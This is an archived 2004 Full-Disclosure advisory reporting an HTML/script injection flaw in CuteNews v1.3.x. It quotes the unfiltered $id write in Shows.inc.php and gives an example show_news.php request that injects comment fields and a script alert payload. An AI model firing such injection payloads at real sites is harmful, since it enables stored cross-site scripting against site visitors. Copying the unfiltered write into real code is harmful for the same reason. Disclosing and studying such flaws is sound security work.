OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
[Full-Disclosure] injection html CuteNews

From: DarkBicho (darkbichofastmail.fm)
Date: Sun Jul 18 2004 - 05:11:19 CDT


Original Advisory: http://www.darkbicho.iberhosting.net/advisory-11.txt

-------------------------------------------------------------------------------------------------

                            :.: injection html CuteNews :.:

  PROGRAM: CuteNews
  HOMEPAGE: http://cutephp.com/
  VERSION: v1.3.x
  BUG: injection html
  DATE: 15/07/2004
  AUTHOR: DarkBicho
          web: http://www.darkbicho.tk
          team: Security Wari Proyects <www.swp-zone.org>
          Email: darkbichoperu.com

-------------------------------------------------------------------------------------------------

1.- Affected software description:
    -----------------------------

    CuteNews is a popular News Publishing, written in php by
    CutePHP.

2.- vulnerability:
    ---------------

    Injection HTML in commentaries

    /inc/Shows.inc.php

    Line: 189

    if(!$found){ fwrite($new_comments,
    "$id|>|$time|$name|$mail|$ip|$comments||\n"); }

    the variable $id is not filtered

    injection html
   
    id of it the news = 1078525267

    Example:

    show_news.php?subaction=addcomment&name=DarkBich0&comments=http://www.darkbicho.tk&id=1078525267|
>|1090074219|DarkBich0|none|127.0.0.1|<script>alert("DarkBicho");</script>||
   
 
    :.: http://www.darkbicho.iberhosting.net/cutenews/cutenews.gif :.:

3.- Exploit:
    --------

    http://www.darkbicho.iberhosting.net/cutenews/

3.- SOLUTION:
     จจจจจจจจ
    Vendors were contacted many weeks ago and plan to release a fixed
    version soon.
    Check the CuteNews website for updates and official release details.

4.- Greetings:
    ---------

    greetings to my Peruvian group swp and perunderforce :D
    "EL PISCO ES Y SERA PERUANO"

5.- Contact
    -------

        WEB: http://www.darkbicho.tk
        EMAIL: darkbichoperu.com

-------------------------------------------------------------------------------------------------
                                ___________ ____________
                               / _____/ \ / \______ \
                               \_____ \\ \/\/ /| ___/
                              / \\ / | |
                             /_______ / \__/\ / |____|
                             \/ \/
                       
                                Security Wari Projects
                                  (c) 2002 - 2004
                                    Made in Peru

----------------------------------------[ EOF
]----------------------------------------------
 
  
  
DarkBicho
Web: http://www.darkbicho.tk
"Mi unico delito es ver lo que otros no pueden ver"

---------------------- The End ----------------------

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html